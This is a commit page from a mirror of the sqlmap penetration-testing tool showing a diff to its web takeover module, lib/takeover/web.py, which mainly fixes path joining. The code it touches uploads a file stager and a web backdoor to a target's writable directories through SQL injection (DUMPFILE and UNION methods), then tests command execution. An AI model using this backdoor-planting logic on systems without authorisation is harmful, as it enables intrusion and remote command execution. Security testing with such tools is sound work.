sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-03-12 00:45:46 +03:00
Code Issues Packages Projects Releases Wiki Activity

Fixes #1248

Browse Source
This commit is contained in:
Miroslav Stampar 2015-05-19 18:40:45 +02:00
parent 17bfda1b9c
commit 699c965bc0
1 changed files with 15 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
lib/takeover/web.py
View File

@ -5,10 +5,11 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission See the file 'doc/COPYING' for copying permission
""" """
import urlparse
import os import os
import posixpath
import re import re
import StringIO import StringIO
import urlparse
from tempfile import mkstemp from tempfile import mkstemp
@ -130,7 +131,7 @@ class Web:
return False return False
def _webFileInject(self, fileContent, fileName, directory): def _webFileInject(self, fileContent, fileName, directory):
outFile = ntToPosixSlashes(os.path.join(directory, fileName)) outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory) uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
query = "" query = ""
@ -203,19 +204,16 @@ class Web:
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi) backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi)) backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi)) stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
success = False success = False
for directory in directories: for directory in directories:
self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
if success:
break
if not directory: if not directory:
continue continue
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
uploaded = False uploaded = False
directory = ntToPosixSlashes(normalizePath(directory)) directory = ntToPosixSlashes(normalizePath(directory))
@ -224,6 +222,9 @@ class Web:
else: else:
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
if not directory.endswith('/'):
directory += '/'
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
infoMsg = "trying to upload the file stager on '%s' " % directory infoMsg = "trying to upload the file stager on '%s' " % directory
infoMsg += "via LIMIT 'LINES TERMINATED BY' method" infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
@ -254,6 +255,9 @@ class Web:
infoMsg += "via UNION method" infoMsg += "via UNION method"
logger.info(infoMsg) logger.info(infoMsg)
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
self.webStagerFilePath = posixpath.join(ntToPosixSlashes(directory), stagerName)
handle, filename = mkstemp() handle, filename = mkstemp()
os.fdopen(handle).close() # close low level handle (causing problems later) os.fdopen(handle).close() # close low level handle (causing problems later)
@ -278,18 +282,7 @@ class Web:
uploaded = True uploaded = True
break break
# Extra check - required
if not uploaded: if not uploaded:
self.webBaseUrl = "%s://%s:%d/" % (conf.scheme, conf.hostname, conf.port)
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" not in uplPage:
continue continue
if "<%" in uplPage or "<?" in uplPage: if "<%" in uplPage or "<?" in uplPage:
@ -343,10 +336,10 @@ class Web:
else: else:
continue continue
self.webBackdoorUrl = ntToPosixSlashes(os.path.join(self.webBaseUrl, backdoorName)) self.webBackdoorUrl = posixpath.join(ntToPosixSlashes(self.webBaseUrl), backdoorName)
self.webDirectory = directory self.webDirectory = directory
self.webBackdoorFilePath = ntToPosixSlashes(os.path.join(directory, backdoorName)) self.webBackdoorFilePath = posixpath.join(ntToPosixSlashes(directory), backdoorName)
testStr = "command execution test" testStr = "command execution test"
output = self.webBackdoorRunCmd("echo %s" % testStr) output = self.webBackdoorRunCmd("echo %s" % testStr)